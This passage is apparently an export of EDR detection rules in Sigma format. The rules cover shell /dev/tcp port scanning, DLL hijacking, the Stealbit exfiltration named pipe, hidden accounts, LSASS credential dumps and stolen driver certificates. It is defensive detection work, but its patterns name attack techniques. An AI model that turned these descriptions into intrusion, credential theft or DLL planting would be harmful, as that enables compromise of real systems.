"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md#atomic-test-1---port-scan",
"https://acc3ssp0int.com/2023/10/15/back-2-basics-dev-tcp/",
"https://attack.mitre.org/techniques/T1046/",
"https://attack.mitre.org/techniques/T1049/"
],
"name": "t1046_scan_ports_bash.yml",
"content": "title: Suspicious TCP Connection from Shell\nid: 8ca3659e-81fe-487c-9ecf-80da110acec4\ndescription: |\n Detects a suspicious TCP connection from a Linux shell command.\n Adversaries can open TCP connections from a shell to scan for open ports and list the services running on a remote host or local network infrastructure devices, including those that may be vulnerable to remote software exploitation.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md#atomic-test-1---port-scan\n - https://acc3ssp0int.com/2023/10/15/back-2-basics-dev-tcp/\n - https://attack.mitre.org/techniques/T1046/\n - https://attack.mitre.org/techniques/T1049/\ndate: 2022/12/28\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1046\n - attack.t1049\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Bash\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: 'echo*>*/dev/tcp/'\n ParentImage|contains: '?'\n\n exclusion_localhost:\n CommandLine|contains:\n - '/dev/tcp/127.0.0.1'\n - '/dev/tcp/localhost'\n\n exclusion_rfc1918:\n CommandLine|contains:\n - '/dev/tcp/192.168.'\n - '/dev/tcp/10.'\n - '/dev/tcp/172.16.'\n\n exclusion_commandline:\n CommandLine|contains:\n - '/dev/tcp/$HOST/$PORT'\n - '/dev/tcp/${host}/${port}'\n\n exclusion_teleport:\n CommandLine|contains|all:\n - 'bash -c #!/bin/bash'\n - 'set -euo pipefail'\n - 'SCRIPT_NAME=\"teleport-installer\"'\n - '# default values'\n - 'ALIVE_CHECK_DELAY='\n\n exclusion_containerd:\n - ProcessParentImage: '/usr/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains: '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_podman:\n - ProcessImage: '/usr/bin/podman'\n - ProcessParentImage: '/usr/bin/podman'\n - ProcessAncestors|contains: '|/usr/bin/podman|'\n\n exclusion_bladelogic:\n - ProcessImage: '/opt/bladelogic/*/bin/rscd_full'\n - ProcessParentImage: '/opt/bladelogic/*/bin/rscd_full'\n - ProcessAncestors|contains: '|/opt/bladelogic/*/bin/rscd_full|'\n\n exclusion_ngmagent:\n - ProcessCommandLine|contains: '/opt/*/NGMAgent/AgentManager/agents/'\n - ProcessParentCommandLine|contains: '/opt/*/NGMAgent/AgentManager/agents/'\n - ProcessGrandparentCommandLine|contains: '/opt/*/NGMAgent/AgentManager/agents/'\n\n exclusion_aptplaton:\n ProcessParentCommandLine|contains: '/bin/aptplaton-register'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_template_cron:\n - ParentImage:\n - '/usr/sbin/cron'\n - '/usr/sbin/crond'\n - Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n exclusion_syslog:\n CommandLine|contains:\n - 'echo \"<13>*>*/dev/tcp/*/514'\n - 'echo \"<14>*>*/dev/tcp/*/514'\n - 'echo \\\\\"<13>*>*/dev/tcp/*/514'\n - 'echo \\\\\"<14>*>*/dev/tcp/*/514'\n\n exclusion_oneautomation:\n ProcessAncestors|contains: '|/opt/oneautomation/*/smgr/bin/ucybsmgr|'\n\n # Avoid multiple detections when the command-line is executed via timeout\n exclusion_timeout:\n - ProcessImage: '/usr/bin/timeout'\n - ProcessCommandLine|contains: 'timeout '\n ProcessParentImage: '/usr/lib/openssh/sshd-session'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8ca3659e-81fe-487c-9ecf-80da110acec4",
"rule_name": "Suspicious TCP Connection from Shell",
"rule_description": "Detects a suspicious TCP connection from a Linux shell command.\nAdversaries can open TCP connections from a shell to scan for open ports and list the services running on a remote host or local network infrastructure devices, including those that may be vulnerable to remote software exploitation.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2022-12-28",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1046",
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8cb69029-47d1-4f24-8749-1271be96e42c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075779Z",
"creation_date": "2026-03-23T11:45:34.075781Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075786Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_computerdefaults.yml",
"content": "title: DLL Hijacking via computerdefaults.exe\nid: 8cb69029-47d1-4f24-8749-1271be96e42c\ndescription: |\n Detects potential Windows DLL Hijacking via computerdefaults.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'computerdefaults.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\MLANG.dll'\n - '\\PROPSYS.dll'\n - '\\Secur32.dll'\n - '\\SSPICLI.DLL'\n - '\\WININET.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8cb69029-47d1-4f24-8749-1271be96e42c",
"rule_name": "DLL Hijacking via computerdefaults.exe",
"rule_description": "Detects potential Windows DLL Hijacking via computerdefaults.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8cedd1b6-00d8-4da3-8d55-99c20ee49ad9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077575Z",
"creation_date": "2026-03-23T11:45:34.077577Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077581Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1041_stealbit_named_pipe_connected.yml",
"content": "title: Stealbit Named Pipe Connected\nid: 8cedd1b6-00d8-4da3-8d55-99c20ee49ad9\ndescription: |\n Detects the connection to a named pipe pertaining to Stealbit.\n Stealbit is a complex exfiltration tool used by the LockBit ransomware group.\n It uses named pipes to coordinate its exfiltration and data-mining threads.\n It is recommended to quickly look for other signs of cybercrime activity on the instance and to isolate infected machines.\nreferences:\n - https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1041\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Malware.Stealbit\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName|endswith: '\\STEALBIT-MASTER-PIPE'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8cedd1b6-00d8-4da3-8d55-99c20ee49ad9",
"rule_name": "Stealbit Named Pipe Connected",
"rule_description": "Detects the connection to a named pipe pertaining to Stealbit.\nStealbit is a complex exfiltration tool used by the LockBit ransomware group.\nIt uses named pipes to coordinate its exfiltration and data-mining threads.\nIt is recommended to quickly look for other signs of cybercrime activity on the instance and to isolate infected machines.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1041",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8d4659ce-e1c4-4c1c-aedb-7fe1ae290905",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591140Z",
"creation_date": "2026-03-23T11:45:34.591144Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591152Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_applicationframehost.yml",
"content": "title: DLL Hijacking via ApplicationFrameHost.exe\nid: 8d4659ce-e1c4-4c1c-aedb-7fe1ae290905\ndescription: |\n Detects potential Windows DLL Hijacking via ApplicationFrameHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ApplicationFrameHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\applicationframe.dll'\n - '\\dxgi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_dgxi:\n ImageLoaded|endswith: '\\dxgi.dll'\n ImageLoaded|startswith:\n - '?:\\Program Files\\WindowsApps\\'\n - '?:\\Program Files (x86)\\WindowsApps\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8d4659ce-e1c4-4c1c-aedb-7fe1ae290905",
"rule_name": "DLL Hijacking via ApplicationFrameHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ApplicationFrameHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8da6fece-5012-491e-a335-8dc1fa9fd87b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089235Z",
"creation_date": "2026-03-23T11:45:34.089237Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089241Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/wgpsec/CreateHiddenAccount",
"https://attack.mitre.org/techniques/T1136/001/"
],
"name": "t1136_001_hidden_user_account.yml",
"content": "title: Hidden User Account Created\nid: 8da6fece-5012-491e-a335-8dc1fa9fd87b\ndescription: |\n Detects when a user account is created with a name that impersonates a computer account.\n Attackers can create a hidden user account to create a hidden persistence on infected systems.\n It is recommended to investigate to context of this user creation and to determine whether it is legitimate.\nreferences:\n - https://github.com/wgpsec/CreateHiddenAccount\n - https://attack.mitre.org/techniques/T1136/001/\ndate: 2021/04/30\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 4720\n TargetUserName|endswith: '$'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8da6fece-5012-491e-a335-8dc1fa9fd87b",
"rule_name": "Hidden User Account Created",
"rule_description": "Detects when a user account is created with a name that impersonates a computer account.\nAttackers can create a hidden user account to create a hidden persistence on infected systems.\nIt is recommended to investigate to context of this user creation and to determine whether it is legitimate.\n",
"rule_creation_date": "2021-04-30",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1136.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8da9a32c-646d-4d3c-a61a-23c5ef613681",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094461Z",
"creation_date": "2026-03-23T11:45:34.094463Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094468Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/",
"https://github.com/gentilkiwi/mimikatz",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_dropping_dump_file.yml",
"content": "title: Minidump File or Mimikatz Output Written to Disk by LSASS\nid: 8da9a32c-646d-4d3c-a61a-23c5ef613681\ndescription: |\n Detects when a minidump or a Mimikatz output is written to disk by the Local Security Authority Subsystem Service (LSASS) process.\n The LSASS process is responsible for authentications in Windows.\n Attackers may try to dump or read its memory to access the credentials of local users.\n A minidump file dropped by the LSASS process could be the result of credential theft.\n It is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\nreferences:\n - https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/\n - https://github.com/gentilkiwi/mimikatz\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2023/03/28\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_write\ndetection:\n selection:\n Image|endswith: '\\lsass.exe'\n FirstBytes|contains:\n # 'Authentication' ascii string, start of mimikatz output\n - '41757468656e7469636174696f6e'\n # Minidump header\n # Value: MDMP\\x93\\xa7\n - '4d444d5093a7'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8da9a32c-646d-4d3c-a61a-23c5ef613681",
"rule_name": "Minidump File or Mimikatz Output Written to Disk by LSASS",
"rule_description": "Detects when a minidump or a Mimikatz output is written to disk by the Local Security Authority Subsystem Service (LSASS) process.\nThe LSASS process is responsible for authentications in Windows.\nAttackers may try to dump or read its memory to access the credentials of local users.\nA minidump file dropped by the LSASS process could be the result of credential theft.\nIt is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\n",
"rule_creation_date": "2023-03-28",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8db0bdc6-3a58-4eb7-af5b-e03ee6e87c7b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088648Z",
"creation_date": "2026-03-23T11:45:34.088650Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088654Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/old-certificate-new-signature/",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_hackingteam_stolen_cert_driver_load.yml",
"content": "title: Driver Loaded Signed with Hacking Team Certificate\nid: 8db0bdc6-3a58-4eb7-af5b-e03ee6e87c7b\ndescription: |\n Detects the loading of a driver signed using one of Hacking Team certificates.\n HackingTeam is an Italian information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations.\n This can be the sign of a malware using a fake signature to evade AV/EDR detection.\n It is recommended to analyze the driver to search for malicious contents.\nreferences:\n - https://blog.talosintelligence.com/old-certificate-new-signature/\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2023/07/13\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: driver_load\n product: windows\ndetection:\n selection:\n DriverSignatureSignerThumbprint:\n - '2A1DA6DC8635E6C725CCCBE6C035EEC813FBEB2E' # Certum Level III CA - Open Source Developer, William Zoltan\n - '6C5886C0DA723E8B2AEC8C02392D4B175E793EBE' # VeriSign Class 3 Code Signing 2010 CA - HT Srl\n - 'B366DBE8B3E81915CA5C5170C65DCAD8348B11F0' # VeriSign Class 3 Code Signing 2010 CA - HT Srl\n - 'B7C646E3A433986E165BA45B209DA4A2C4111939' # Certum Code Signing CA - Luca Marcone\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8db0bdc6-3a58-4eb7-af5b-e03ee6e87c7b",
"rule_name": "Driver Loaded Signed with Hacking Team Certificate",
"rule_description": "Detects the loading of a driver signed using one of Hacking Team certificates.\nHackingTeam is an Italian information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations.\nThis can be the sign of a malware using a fake signature to evade AV/EDR detection.\nIt is recommended to analyze the driver to search for malicious contents.\n",
"rule_creation_date": "2023-07-13",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8e009fca-fb86-4253-b33b-b0f0f1ae7ba3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092834Z",
"creation_date": "2026-03-23T11:45:34.092836Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092840Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_powerpnt.yml",
"content": "title: DLL Hijacking via POWERPNT.exe\nid: 8e009fca-fb86-4253-b33b-b0f0f1ae7ba3\ndescription: |\n Detects potential Windows DLL Hijacking via POWERPNT.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'POWERPNT.EXE'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\dataexchange.dll'\n - '\\msctf.dll'\n - '\\mswsock.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\rsaenh.dll'\n - '\\twinapi.dll'\n - '\\windows.storage.dll'\n - 